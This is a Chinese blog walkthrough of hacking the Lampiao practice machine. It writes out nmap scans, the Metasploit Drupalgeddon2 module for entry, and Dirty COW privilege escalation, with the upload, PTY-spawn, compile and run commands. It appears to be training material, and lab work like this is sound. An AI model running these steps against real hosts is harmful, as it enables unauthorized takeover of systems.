靶机Lampiao入侵实战

因为lampiao账号密码未知的,使用主机扫描,

1、扫描网络中活动的主机

扫描192.168.29.0/24网络中活动的主机,从而获取靶机IP地址

nmap -sP 192.168.163.0/24

找到:192.168.163.142

 

 

2、扫描主机开放的端口和服务

扫描结果我们基本可以确定目标靶机的ip为192.168.163.142

nmap -p 1-65535 - -sV 192.168.163.142命令进行端口扫描

开启了22、80、1898端口

 分别访问了22、80、1898端口;22端口无法访问;80端口如下,

1898端口如下

 

3、扫描主机的操作系统和版本号

nmap -O 192.168.163.142

(4)扫描主机可能存在的已知漏洞

Nmap --script=vuln -p22,80,1898 192.163.142

没有找到任何漏洞

 

nessus扫描

 

在目录中发现了robots.txt文件

 

查看CHANGELOG.txt文件,发现网站的版本信息


msfconsole //启动msf

Search drupal

 尝试了第一个结果失败

 

尝试第二个:1  exploit/unix/webapp/drupal_drupalgeddon2       2018-03-28       excellent  Yes    Drupal Drupalgeddon 2 Forms API Property Injection

 

设置主机,端口等,运行漏洞

pwd是目标主机的工作目录,getuid #查看当前登录的账号,www-data是普通用户

 继续提权

脏牛漏洞

searchsploit dirty

 

上传漏洞的源码到靶机上

meterpreter > upload /usr/share/exploitdb/exploits/linux/local/40847.cpp /tmp

 

使用python调出交互模式

python -c "import pty; pty.spawn('/bin/bash')"


g++ -Wall -pedantic -o2 -std=c++11 -pthread -o dcow 40847.cpp -luti

./dcow -s运行

提权成功

 

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

橙子煮水

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值